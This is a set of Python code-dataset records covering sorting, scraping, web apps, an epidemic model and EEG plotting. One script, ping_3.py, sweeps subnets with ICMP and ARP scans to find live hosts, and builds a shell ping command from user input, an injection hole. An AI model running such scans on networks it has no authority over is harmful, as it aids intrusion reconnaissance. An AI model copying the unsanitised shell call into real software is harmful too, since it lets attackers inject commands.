len(data)\n\n    for i in range(1, length):\n        key = data[i]\n        j = i - 1\n\n        while ( (j+1) > 0 and data[j] > key):\n            data[j+1] = data[j]\n            j = j - 1\n\n        data[j+1] = key\n","sub_path":"Lab 2/insertion_sort.py","file_name":"insertion_sort.py","file_ext":"py","file_size_in_byte":247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"78443423","text":"class Person(object):\n    def __getattribute__(self, obj):\n        print(\"---test---%s\" % obj)\n        if obj.startswith(\"a\"):\n            return \"haha\"\n\n        else:\n            # fall back to the default lookup; returning self.test here would\n            # re-enter __getattribute__ and recurse forever\n            return object.__getattribute__(self, obj)\n\n    def test(self):\n        print(\"heihei\")\n\n\nt = Person()\n\nprint(t.a)\n#print(t.b)\n","sub_path":"PycharmProjects/PythonCodes/02-Senior/05-内建属性/03-__getattribute__.py","file_name":"03-__getattribute__.py","file_ext":"py","file_size_in_byte":281,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"135563352","text":"countries = ['FR', 'US', 'DE', 'RU'] #a list is a collection of elements stored under one variable name\ncountries[1] = 'GB' #change the value of the list element at the chosen index\nprint(countries[1]) #access a specific index of the list / Python indexes from 0\ncountries.append(\"PL\") #append adds new elements at the end of the list\ncountries.insert(2,'ES') #insert - put an element at the chosen position\ncountries.remove(\"RU\") #remove - deletes an element from the list\ncountries.sort() #sort - sorts the list\ncountries.reverse() #reverse - reverses the order of the list\nprint(countries.pop(2)) #pop - returns the value at the given position, then removes it from the list\nprint(countries.index(\"PL\")) #index - checks whether an element occurs in the list and returns its position\nprint(countries.count(\"DE\")) #count - counts how many times a value occurs in the list\n\nnewList = ['FI', 'SE']\ncountries.extend(newList) #extend - appends another list to the current one\n\ncountriesCopy = countries.copy() #copy - creates a new copy of the list\ncountriesCopy.clear() #clear - empties the list\n\nprint(countries)\nprint(countriesCopy)","sub_path":"Python/Beginner/UdemyPythonForBeginners/05_34_Lists.py","file_name":"05_34_Lists.py","file_ext":"py","file_size_in_byte":1141,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"97247195","text":"#!/usr/bin/python\n\nimport random\n\ninputFilename = 'ContributorList.txt'\noutputFilename = 'ContributorListRandom.tex'\n\ninputFile=open(inputFilename, 'r')\ncontributors = inputFile.readlines()\ninputFile.close()\n#remove empty lines\ncontributors = filter(lambda x:len(x)>5, contributors)\n#remove trailing return\ncontributors = map(lambda x: x[0:len(x)-1], contributors)\n \nrandomIndex = range(len(contributors))\nrandom.shuffle(randomIndex)\n\noutputFile=open(outputFilename, 'w')\nfor i in range(1,len(contributors)-1):\n    outputFile.write(contributors[randomIndex[i]])\n    outputFile.write(', ')\n    \noutputFile.write(contributors[randomIndex[len(contributors)-1]])\n\noutputFile.close()\n","sub_path":"SoftwareGuide/Latex/generateRandomContributorList.py","file_name":"generateRandomContributorList.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"418274019","text":"from bs4 import BeautifulSoup as BS\r\nimport requests\r\nfrom datetime import datetime\r\n\r\n\r\ndef get_info(url):\r\n    data=requests.get(url)\r\n    soup=BS(data.text,'html.parser')\r\n    
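The extraction that continues below pulls the worldometers counters out by CSS class. For reference, the same BeautifulSoup pattern against inline stand-in markup (this HTML is illustrative, not the live page):

```python
from bs4 import BeautifulSoup

html = """
<div class="maincounter-number"> 1,234,567 </div>
<span class="number-table">900,000</span>
<span class="number-table">12,345</span>
"""
soup = BeautifulSoup(html, "html.parser")
total = soup.find("div", class_="maincounter-number").text.strip()
numbers = [s.text for s in soup.find_all("span", class_="number-table")]
print(total, numbers)  # 1,234,567 ['900,000', '12,345']
```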
total=soup.find(\"div\",class_=\"maincounter-number\").text\r\n    total=total[1:len(total)-2]\r\n    other=soup.find_all(\"span\",class_=\"number-table\")\r\n    recovered=other[2].text\r\n    deaths=other[3].text\r\n    deaths=deaths[1:]\r\n    \r\n    ans={'last updated':str(datetime.now()),'total cases':total,'recovered cases':recovered,'total deaths':deaths}\r\n    return ans\r\nurl=\"https://www.worldometers.info/coronavirus/\"\r\nans=get_info(url)\r\nfor i,j in ans.items():\r\n    print(i+\":\"+j)","sub_path":"temp.py","file_name":"temp.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"301542312","text":"from django.utils import timezone\n\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom prc1.forms import PostForm\nfrom prc1.models import Post\n\n\ndef post_list(request):\n    posts = Post.objects.all()\n    return render(request, 'post_list.html', {'posts':posts})\n\ndef post_new(request):\n    if request.method == \"POST\":\n        form = PostForm(request.POST)\n        if form.is_valid():\n            post = form.save(commit=False)\n            post.author = request.user\n            post.published_date = timezone.now()\n            post.save()\n        return redirect('post_new')\n    else:\n        form = PostForm()\n    return render(request, 'post_list.html', {'form':form})","sub_path":"prc1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"161276255","text":"import typing\nimport flask\nimport flask_restful\nimport audio\nimport queue\nimport audio_manager\n\n\nclass 
StreamSink(flask_restful.Resource):\n \"\"\"\n Handler for creating a new output\n \"\"\"\n\n @staticmethod\n def get(name: str) -> flask.Response:\n \"\"\"\n Create a new MP3 output stream\n :param name: The name to give the stream\n :return: The streaming response\n \"\"\"\n return flask.Response(Mp3Generator(name), mimetype=\"audio/mpeg\")\n\n\ndef setup_api(api: flask_restful.Api) -> None:\n \"\"\"\n Configure the REST endpoints for this namespace\n :param api: The API to add the endpoints to\n \"\"\"\n api.add_resource(StreamSink, '/audio/output_stream/')\n","sub_path":"rest/stream_sink.py","file_name":"stream_sink.py","file_ext":"py","file_size_in_byte":2961,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"437583437","text":"\"\"\"\r\n\r\na= [1, 2, 3, 4]\r\nfor i in range(len(a)):\r\n if i == 1:\r\n del a[i]\r\n\"\"\"\r\n\"\"\"\r\na = [1, 2, 3, 4, 5, 6, 7]\r\n\r\nprint(a[2:5])\r\n\"\"\"\r\n\"\"\"\r\na = int(input())\r\nb= []\r\nwhile a != 1:\r\n b.append(a%2)\r\n a = a//2\r\nb.append(1)\r\nprint(b)\r\n\r\nfor i in range(len(b)- 1, -1, -1):\r\n print(b[i])\r\n\"\"\"\r\nimport random\r\na = int(input())\r\n\r\nstart = 1\r\nend = 100\r\nhalf = 50\r\n\r\nfor i in range(1, 100):\r\n if a == half:\r\n break\r\n elif a > half:\r\n start = half\r\n else:\r\n end = half\r\n\r\n half = (start+end)//2\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"ssss.py","file_name":"ssss.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"6335402","text":"from urllib.request import urlopen\nimport sys\n\n\ndef fetch_words(url):\n with urlopen(url) as story:\n story_words = []\n for line in story:\n line_words = line.decode('utf-8').split()\n for word in line_words:\n story_words.append(word)\n return story_words\n\n\ndef print_items(items):\n for item in items:\n print(item)\n\n\ndef main(url):\n words = fetch_words(url)\n print_items(words)\n\n\nprint(__name__)\n# When called as script ($ python words.py), execute fetch_words function of words module\nif __name__ == '__main__':\n url = sys.argv[1]\n main(url)\n","sub_path":"Python/src/words.py","file_name":"words.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"398813745","text":"\"\"\"Logic to create sqlalchemy database engine.\"\"\"\nimport os\nimport json\nimport sys\nimport logging\nimport inspect\nfrom sqlalchemy import create_engine, event\nfrom augur.application.logs import initialize_stream_handler\nfrom augur.application.db.util import catch_operational_error\n\n\nlogger = logging.getLogger(\"engine\")\ninitialize_stream_handler(logger, logging.ERROR)\n\ndef get_database_string() -> str:\n \"\"\"Get database string from env or file\n\n Note:\n If environment variable is defined the function \n will use that as the database string. And if the \n environment variable is not defined, it will use the \n db.config.json file to get the database string\n\n Returns:\n postgres database string\n \"\"\"\n\n augur_db_environment_var = os.getenv(\"AUGUR_DB\")\n\n current_dir = os.getcwd()\n db_json_file_location = current_dir + \"/db.config.json\"\n db_json_exists = os.path.exists(db_json_file_location)\n\n if not augur_db_environment_var and not db_json_exists:\n\n logger.error(\"ERROR no way to get connection to the database. 
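get_database_string() above resolves the connection string env-var-first, then falls back to db.config.json. A condensed sketch of that resolution order (the config keys are taken from the code that follows; the helper name is hypothetical):

```python
import json
import os

def resolve_db_string(config_path="db.config.json"):
    """Prefer the AUGUR_DB env var; otherwise build the URI from the JSON config."""
    env = os.getenv("AUGUR_DB")
    if env:
        return env
    with open(config_path) as f:
        cfg = json.load(f)
    return (
        f"postgresql+psycopg2://{cfg['user']}:{cfg['password']}"
        f"@{cfg['host']}:{cfg['port']}/{cfg['database_name']}"
    )
```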
\\n\\t\\t\\t\\t\\t\\t There is no db.config.json and the AUGUR_DB environment variable is not set\\n\\t\\t\\t\\t\\t\\t Please run make install or set the AUGUR_DB environment then run make install\")\n sys.exit()\n\n if augur_db_environment_var:\n return augur_db_environment_var\n\n\n with open(\"db.config.json\", 'r') as f:\n db_config = json.load(f)\n\n db_conn_string = f\"postgresql+psycopg2://{db_config['user']}:{db_config['password']}@{db_config['host']}:{db_config['port']}/{db_config['database_name']}\"\n\n return db_conn_string\n\n\ndef create_database_engine(): \n \"\"\"Create sqlalchemy database engine \n\n Note:\n A new database engine is created each time the function is called\n\n Returns:\n sqlalchemy database engine\n \"\"\" \n\n # curframe = inspect.currentframe()\n # calframe = inspect.getouterframes(curframe, 2)\n # print('file name:', calframe[1][1])\n # print('function name:', calframe[1][3])\n\n db_conn_string = get_database_string()\n\n engine = create_engine(db_conn_string)\n\n @event.listens_for(engine, \"connect\", insert=True)\n def set_search_path(dbapi_connection, connection_record):\n existing_autocommit = dbapi_connection.autocommit\n dbapi_connection.autocommit = True\n cursor = dbapi_connection.cursor()\n cursor.execute(\"SET SESSION search_path=public,augur_data,augur_operations,spdx\")\n cursor.close()\n dbapi_connection.autocommit = existing_autocommit\n\n return engine\n\n\nclass EngineConnection():\n\n def __init__(self, engine):\n self.connection = self.get_connection(engine)\n\n def __enter__(self):\n return self.connection\n\n def __exit__(self, exception_type, exception_value, exception_traceback):\n\n self.connection.close()\n\n def get_connection(self, engine):\n\n func = engine.connect\n\n return catch_operational_error(func)\n\n \n\n\n\n","sub_path":"augur/application/db/engine.py","file_name":"engine.py","file_ext":"py","file_size_in_byte":2996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"197493882","text":"class Solution(object):\r\n def search(self, nums, target):\r\n \"\"\"\r\n :type nums: List[int]\r\n :type target: int\r\n :rtype: int\r\n \"\"\"\r\n index = -1\r\n left, right = 0, len(nums)-1\r\n if left == right and nums[0] == target:\r\n return 0\r\n \r\n while left < right:\r\n mid = left + (right - left) / 2\r\n if nums[left] == target: index = left\r\n if nums[mid] == target: index = mid\r\n if nums[right] == target: index = right\r\n if index != -1: break\r\n \r\n if target > nums[mid]:\r\n if nums[mid] < nums[right] and nums[right] < target:\r\n right = mid\r\n elif (nums[mid] > nums[right] and target > nums[right]) \\\r\n or (nums[mid] < nums[right] and target < nums[right]):\r\n left = mid + 1\r\n else:\r\n break\r\n elif target < nums[mid]:\r\n if nums[mid] > nums[right] and nums[right] > target:\r\n left = mid + 1\r\n elif (nums[mid] > nums[right] and target > nums[right]) \\\r\n or (nums[mid] < nums[right] and target < nums[right]):\r\n right = mid\r\n else:\r\n break\r\n return index\r\n \r\n\"\"\"\r\nAnother solution of mine inspired by:\r\nhttps://leetcode.com/discuss/80607/pretty-short-c-java-ruby-python\r\n\"\"\"\r\nclass Solution:\r\n def search(self, A, target):\r\n if A == []:\r\n return -1\r\n \r\n left, right = 0, len(A) - 1\r\n while left < right:\r\n mid = (left + right) / 2\r\n if A[mid] == target:\r\n return mid\r\n if A[left] < A[right]: # sorted in A[left : right+1]\r\n if target <= A[mid]:\r\n right = mid\r\n else:\r\n left = mid + 1\r\n else: # a drop 
in A[left : right+1]\r\n if A[mid] > A[right]:\r\n if A[left] <= target <= A[mid]:\r\n right = mid\r\n else:\r\n left = mid + 1\r\n else:\r\n if A[mid] <= target <= A[right]:\r\n left = mid + 1\r\n else:\r\n right = mid \r\n \r\n if A[right] == target:\r\n return right\r\n return -1\r\n \r\n###########################################################################\r\n\"\"\"\r\nA much more clever solution than mine!\r\nhttps://leetcode.com/discuss/80607/pretty-short-c-java-ruby-python\r\n\"\"\"\r\nclass Solution(object):\r\n def search(self, nums, target):\r\n left, right = 0, len(nums)-1\r\n while left < right:\r\n mid = left + (right - left) / 2\r\n if not ((nums[0] <= target) ^ (target <= nums[mid]) ^ (nums[mid] < nums[0])):\r\n # a^b^c->False only if they're all False or two of them are True(In this problem, they're impossible to be all False)\r\n right = mid\r\n else:\r\n left = mid + 1\r\n \r\n return left if nums[left] == target else -1\r\n \r\n###########################################################################\r\n\"\"\"\r\nA much more clever solution than mine! \r\nhttps://leetcode.com/discuss/80659/clever-idea-making-it-simple\r\n\"\"\"\r\nclass Solution(object):\r\n def search(self, nums, target):\r\n left, right = 0, len(nums)-1\r\n inf = float(\"inf\")\r\n while left < right:\r\n mid = left + (right - left) / 2\r\n num = nums[mid] if (nums[mid] < nums[0]) == (target < nums[0]) else ( -inf if target < nums[0] else inf )\r\n \r\n if num < target:\r\n left = mid + 1\r\n else:\r\n right = mid\r\n \r\n return left if nums[left] == target else -1","sub_path":"src/033_SearchInRotatedSortedArray.py","file_name":"033_SearchInRotatedSortedArray.py","file_ext":"py","file_size_in_byte":3967,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"21171836","text":"# -*- coding: utf-8 -*-\nfrom scipy.integrate import odeint\nimport numpy as np\n\nimport matplotlib\nimport matplotlib.pyplot as plt\nfrom cProfile import label\n\n\nclass SEIR:\n\n def __init__(self,\n incubation_period=5.5,\n infective_period=7,\n basic_reproduction_rate=2,\n intervention_times=[70, 75, 100, 200, 300],\n p0=(83019212., 0., 1., 0.),\n t_vals=np.arange(0., 365., 1.)):\n self.t_inf = infective_period\n self.t_inc = incubation_period\n self.r0 = basic_reproduction_rate\n self.t_vals = t_vals\n self.p0 = tuple(p0)\n self.n = sum(self.p0)\n self.intervention_times = intervention_times\n\n def get_current_r(self, t, r_list):\n current_r = r_list[0]\n for i, intervention_time in enumerate(self.intervention_times):\n if t >= intervention_time:\n if (i + 1) < len(r_list):\n current_r = r_list[i + 1]\n return current_r\n\n def dS(self, t, susceptible, infectious, r_list):\n current_r = self.get_current_r(t, r_list)\n return -1 * susceptible / self.n * (current_r / self.t_inf * infectious)\n\n def dE(self, t, susceptible, exposed, infectious, r_list):\n current_r = self.get_current_r(t, r_list)\n return (susceptible / self.n) * (current_r / self.t_inf * infectious) - exposed / self.t_inc\n\n def dI(self, exposed, infectious):\n return exposed / self.t_inc - infectious / self.t_inf\n\n def dR(self, infectious):\n return infectious / self.t_inf\n\n def system(self, y, t, r_list=None):\n susceptible, exposed, infectious, removed = y\n if r_list is None:\n r_list = [self.r0] * len(self.intervention_times)\n return [self.dS(t, susceptible, infectious, r_list),\n self.dE(t, susceptible, exposed, infectious, r_list),\n self.dI(exposed, infectious),\n 
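# removed compartment: fed by infectious individuals recovering at rate 1/t_inf\n                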
self.dR(infectious)]\n\n    def __call__(self, t, r0, r1, r2, r3, e0):\n        return np.sum(self.getSEIR(t, [r0, r1, r2, r3, r1, r0], e0)[:, 1:], axis=1)\n\n    def getSEIR(self, t, r_list, e0):\n        S0, E0, I0, R0 = self.p0\n        # susceptibles are the population remainder once the seeded exposed, infectious and removed are subtracted\n        p0 = (self.n - e0 - I0 - R0, e0, I0, R0)\n        return odeint(self.system, y0=p0, t=t, args=(r_list,))\n\n\nif __name__ == \"__main__\":\n    Sres = []\n    Eres = []\n    Ires = []\n    Rres = []\n    bev_de = 83019213.\n    times = np.arange(0., 2 * 365., 1.0)\n    inter_times = [70, 75, 100, 125, 150, 175, 200, 225, 250, 275]\n    rep_values = [3.4, 2.5, 1.15, 0.8, 1.15, 0.8, 1.15, 0.8, 1.15, 0.8]\n    e0 = 0.\n    p = [bev_de - 1, e0, 1., 0.] # Start condition for S, E, I, R\n    model = SEIR(p0=p, intervention_times=inter_times, t_vals=times)\n    for p in model.getSEIR(times, rep_values, e0):\n        # print(\"{0:09.0f}\\t{1:09.0f}\\t{2:09.0f}\\t{3:09.0f}\".format(*p))\n        Sres.append(p[0])\n        Eres.append(p[1])\n        Ires.append(p[2])\n        Rres.append(p[3])\n    \n    fig, ax = plt.subplots()\n    #ax.plot(times, Sres, label='S')\n    ax.plot(times, Eres, label='E')\n    ax.plot(times, Ires, label='I')\n    ax.plot(times, Rres, label='R')\n    ax.set(xlabel='time (days)', ylabel='people', title='Plot SEIR model')\n    ax.grid()\n    ax.legend()\n    \n    #fig.savefig(\"seirmodel.png\")\n    plt.show()\n    \n","sub_path":"seirmodel/equations.py","file_name":"equations.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"155235857","text":"import os\nimport numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom glob import glob\nsns.set()\n\n\ndef load_data(source_folder, recording, sep):\n    '''\n    Loads power spectrum csv into a pandas DataFrame for all channels in the recording subdirectory of the source folder\n    Parameters:\n        source_folder = root folder for csv files\n        recording = name of subdirectory for individual recording. Subdirectory should contain\n            the csv files for each channel\n        sep = operating system directory separator e.g. '/'\n    Returns:\n        data = list of pandas DataFrames corresponding to different channels\n        file_names = list of filenames (index is the same for data; i.e. 
the label for the first\n            channel is file_names[0] and the corresponding data is found in data[0])\n    '''\n    data_dir = sep.join([source_folder, recording])\n    os.chdir(data_dir)\n    file_names = glob(\"*.csv\")\n    data = [pd.read_csv(file, index_col=0) for file in file_names]\n    return data, file_names\n\n\ndef manipulate_df(df):\n    '''\n    Manipulates a pandas df such that it is ready for time frequency analysis\n    Parameters:\n        df = pandas DataFrame\n    Returns:\n        log_df = logged values of df\n        low_freqs_df = logged values of df indexed such that only the low frequencies are present\n    '''\n    log_df = np.log(df)\n    log_df.reset_index(inplace=True)\n    log_df['time'] = pd.to_timedelta(log_df['time'])\n    log_df.set_index('time', inplace=True)\n    low_freqs_df = log_df.iloc[:, :80]\n    return log_df, low_freqs_df\n\n\ndef plot_mean_power(dfs, recording, chan_lab, both, dpi,\n                    fig_out_folder, verbose, sep):\n    '''\n    Takes a pandas DataFrame and plots mean power density across all time periods\n    Parameters:\n        dfs = pandas DataFrame or list of two DataFrames\n        recording = name of the recording being plotted\n        chan_lab = label of the channel being plotted\n        both = Bool, whether plotting both low and all frequencies,\n            or (False) just all frequencies\n        dpi = resolution of the produced image\n        fig_out_folder = directory of the produced figure\n        verbose = Bool\n        sep = operating system directory separator e.g. '/'\n    '''\n    if verbose:\n        print('Plotting mean power figures')\n    if both and len(dfs) == 2:\n        f, a = plt.subplots(nrows=2, ncols=1, figsize=(10, 10))\n        labs = ['All Frequencies', 'Low Frequencies']\n        for ind, df in enumerate(dfs):\n            mean_freqs = df.apply(np.mean, axis=0)\n            a[ind].plot(mean_freqs.index, mean_freqs.values)\n            a[ind].set_xlabel('Frequency (Hz)')\n            a[ind].set_ylabel('Mean Power Density')\n            a[ind].set_title(' '.join([recording, labs[ind], chan_lab]))\n    else:\n        f, a = plt.subplots(figsize=(10, 10))\n        mean_freqs = dfs.apply(np.mean, axis=0)\n        a.plot(mean_freqs.index, mean_freqs.values)\n        a.set_xlabel('Frequency (Hz)')\n        a.set_ylabel('Mean Power Density')\n        a.set_title(recording)\n    filename = genfirgure_fname(fig_out_folder,\n                                fig_type='mean_power',\n                                recording=recording,\n                                chan_lab=chan_lab,\n                                sep=sep)\n    plt.tight_layout()\n    plt.savefig(fname=filename, dpi=dpi)\n\n\ndef plot_spectrogram(dfs, recording, chan_lab,\n                     recording_len, dpi, verbose, both,\n                     fig_out_folder, vmin, vmax, sep):\n    '''\n    Takes a pandas DataFrame and plots and saves a spectrogram\n    Parameters:\n        dfs = pandas DataFrame or list of two DataFrames\n        recording = name of the recording being plotted\n        chan_lab = label of the channel being plotted\n        recording_len = Length of the recording. Used to calculate xticks\n        both = Bool, whether plotting both low and all frequencies,\n            or (False) just all frequencies\n        dpi = resolution of the produced image\n        fig_out_folder = directory of the produced figure\n        verbose = Bool\n        sep = operating system directory separator e.g. 
'/'\n    '''\n    if verbose:\n        print('Plotting spectrograms')\n    x_tick_pos = round(recording_len / 4)\n    if both and len(dfs) == 2:\n        f, a = plt.subplots(nrows=2, ncols=1, figsize=(10, 10))\n        labs = ['All Frequencies', 'Low Frequencies']\n        for ind, df in enumerate(dfs):\n            sns.heatmap(df.transpose(),\n                        vmin=vmin, vmax=vmax, cmap='coolwarm',\n                        xticklabels=x_tick_pos, ax=a[ind])\n            a[ind].set_ylabel('Frequency\\n(Hz)')\n            a[ind].set_xticklabels(list(map(lambda num:\n                                            str(round(recording_len / 4 / 60 * num,\n                                                      -1)),\n                                            [0, 1, 2, 3])))\n            a[ind].set_xlabel('Time \\n(min)')\n            a[ind].set_title(labs[ind])\n            a[ind].invert_yaxis()\n        filename = genfirgure_fname(fig_out_folder,\n                                    fig_type='spectrograms',\n                                    recording=recording,\n                                    chan_lab=chan_lab,\n                                    sep=sep)\n    else:\n        f, a = plt.subplots(figsize=(10, 10))\n        sns.heatmap(dfs.transpose(),\n                    vmin=vmin, vmax=vmax, cmap='coolwarm',\n                    xticklabels=x_tick_pos, ax=a)\n        a.set_ylabel('Frequency\\n(Hz)')\n        a.set_xticklabels(list(map(lambda num:\n                                   str(round(recording_len / 4 / 60 * num,\n                                             -1)),\n                                   [0, 1, 2, 3])))\n        a.set_xlabel('Time \\n(min)')\n        a.set_title(recording)\n        a.invert_yaxis()\n        filename = genfirgure_fname(fig_out_folder,\n                                    fig_type='spectrograms',\n                                    recording=recording,\n                                    chan_lab=chan_lab,\n                                    sep=sep)\n    plt.tight_layout()\n    plt.savefig(fname=filename, dpi=dpi)\n\n\ndef genfirgure_fname(fig_out_folder, fig_type, recording,\n                     chan_lab, sep):\n    '''\n    Generates an absolute path to a .png figure\n    Creates necessary directories\n    Parameters:\n        fig_out_folder = root figure folder\n        fig_type = category of figure\n        recording = name of recording\n        chan_lab = chan label for data\n        sep = operating system directory separator e.g. '/'\n    '''\n    out_dir = sep.join([fig_out_folder, fig_type])\n    if not os.path.exists(out_dir):\n        os.mkdir(out_dir)\n    out_dir = sep.join([out_dir, recording])\n    if not os.path.exists(out_dir):\n        os.mkdir(out_dir)\n    return sep.join([out_dir, recording]) + '_' + chan_lab + '.png'\n","sub_path":"eeg_analysis/spectrograms/funcs.py","file_name":"funcs.py","file_ext":"py","file_size_in_byte":7309,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"333866094","text":"# Imports two libraries to our game\nimport pygame\nimport random\n\n#Initialize the pygame (loop, game screen)\npygame.init()\n\n#Declares some variables\nwinHeight = 480\nwinWidth = 700\nGREEN = (0, 255, 0)\n\n#Create window game\nwin = pygame.display.set_mode((winWidth,winHeight))\npygame.display.set_caption(\"Drown Guy\")\n\n#main program\n# create game loop to keep the window\ninPlay = True\nwhile inPlay:\n    win.fill(GREEN) #Make background colour green\n    pygame.display.update() #call update() so the frame is actually drawn\n    pygame.time.delay(10)\n    for event in pygame.event.get(): #handle window events so the game can be closed\n        if event.type == pygame.QUIT:\n            inPlay = False\n    \n\n\n\n\n#quit the pygame\npygame.quit()\n","sub_path":"CODE/DrownGuy.py","file_name":"DrownGuy.py","file_ext":"py","file_size_in_byte":535,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"47"} +{"seq_id":"348531991","text":"import itertools\r\nn=int(input())\r\nl=str(input())\r\nl=l.replace(\" \",\"\")\r\nlist_arr=[]\r\n\r\nfor subset in itertools.permutations(str(l), len(l)):\r\n    a=''.join(map(str,subset))\r\n    list_arr.append(int(a))\r\nprint(max(list_arr))","sub_path":"set-1/Longest number.py","file_name":"Longest number.py","file_ext":"py","file_size_in_byte":222,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"365847948","text":"#!/usr/bin/python\n#coding=utf-8\n\nimport multiprocessing \nimport time\nimport ipaddress\nfrom scapy.all import 
*\nimport logging\nlogging.getLogger(\"scapy.runtime\").setLevel(logging.ERROR)\nimport subprocess \n\n\n#if len(list(ipaddress.IPv4Network(ip_net))) > 50:\n#\tprocess_number = 50\n#else :\n#\tprocess_number = len(list(ipaddress.IPv4Network(ip_net)))\n\n#---------------------------------------------------------------------\ndef icmp_ping(ipaddr):\n\tans , unans = sr(IP(dst=ipaddr)/ICMP(type='echo-request' , code=0)/'abcdefghijklmnopqrst', timeout = 1 , verbose = False)\n\tif ans:\n\t\treturn (ipaddr , 1)\n\telif unans:\n\t\treturn (ipaddr , 0)\n\telse :\n\t\tprint ('An unexpected error occured')\n\ndef multi_icmp_ping(ip_net):\n\tip_list = []\n\tip_active =[]\n\tip_inactive = []\n\tfor i in ipaddress.IPv4Network(ip_net):\n\t\tip_list.append(str(i))\n\tprint ('listing compelet')\n\tpool = multiprocessing.Pool(processes=50)\n\tresult = pool.map(icmp_ping, ip_list)\n\tfor ip,code in result:\n\t\tif code == 1:\n\t\t\tip_active.append(ip)\n\t\telif code == 0:\n\t\t\tip_inactive.append(ip)\n\t\telse :\n\t\t\tpass\n\tprint ('-' * 30+'\\nactive ip address:\\n'+'-' * 30 )\n\tprint (ip_active)\n\tprint ('-' * 30+'\\ninactive ip address:\\n' + '-' * 30 )\n\tprint (ip_inactive)\n\t#return (ip_active)\n#-----------------------------------------------------------------------\n\ndef sys_ping(ipaddr):\n\t\n\tif subprocess.call('ping -c 1 %s > /dev/null' % ipaddr,shell = True) == 0:\n\t\tprint ('%-15s ----> up !' % ipaddr )\n\telse :\n\t\tprint ('%-15s ----> down .' % ipaddr )\n\n#--------------------------------------------------------------------------\ndef ARP_ping(ipaddr):\n\tans,unans = srp(Ether(dst=\"ff:ff:ff:ff:ff:ff\")/ARP(pdst=ipaddr),timeout=2,verbose = False)\n\t#ans.summary(lambda s,r: r.sprintf(\"%IP.src% is alive\") ) \n\ttotal_alive_num = len(ans)\n\tprint ('-' * 35)\n\tfor i in range(total_alive_num):\n\t\t#percent = 1.0 * (i+1) / 2 * 100 \n\t\talive_ip = ans[i][1].getlayer(ARP).psrc\n\t\talive_mac = ans[i][1].getlayer(ARP).hwsrc\n\t\tprint ('%-15s:[%17s] --> is alive' % (alive_ip,alive_mac))\n\n\nif __name__ == '__main__':\n\tmethod_ping_str = input ('''请输入你需要使用的工具(数字1、2、3):\n 1 --> ip range 系统命令,比较靠谱,速度较快;\n 2 --> ip net scapy_ping 程序自己铸造数据包,速度稍慢,返回在线主机列表,离线主机列表;\n 3 --> ARP ping 同网段速度快,禁ping也能发现你; \n ps: 愿你想ping通你所需要ping通的地址。 |>_<| \\n ''')\n\tmethod_ping = int(method_ping_str)\n\n\tif method_ping == 1 :\n\t\tiplist = []\n\t\tip_min = input('Plz input the low IP address : \\n')\n\t\tip_max = input('Plz input the high IP address : \\n')\n\t\t#eg:\n\t\t#ip_min = '192.168.3.2'\n\t\t#ip_max = '192.168.3.50'\n\t\tip_tmp = ip_min.split('.')\n\t\tlow = int(ip_min.split('.')[3])\n\t\thigh = int(ip_max.split('.')[3])\n\t\tfor i in range( high - low ):\n\t\t\tip_tmp[3] = str(low + ( i + 1 ))\n\t\t\tiplist.append('.'.join(ip_tmp))\n\t\tprocess_number = 50\n\t\tpool = multiprocessing.Pool(processes=process_number) \n\t\tfor ip in iplist:\n\t\t\tpool.apply_async(sys_ping,(ip,)) \n\t\tpool.close() \n\t\tpool.join()\n\n\telif method_ping == 2:\n\t\tip_net = input('Plz input the ip net : <192.168.1.0/24> \\n')\n\t\tmulti_icmp_ping(ip_net)\n\n\telif method_ping == 3:\n\t\tipaddr = input ('Plz input the ip net : <192.168.1.0/24> \\n')\n\t\tARP_ping(ipaddr)\n\telse :\n\t\tprint('input error !')\n\n\n","sub_path":"ping_3.py","file_name":"ping_3.py","file_ext":"py","file_size_in_byte":3304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"49"} +{"seq_id":"450233368","text":"# Extend the task by requiring the subject to respond by pressing a spacebar (the key is called 
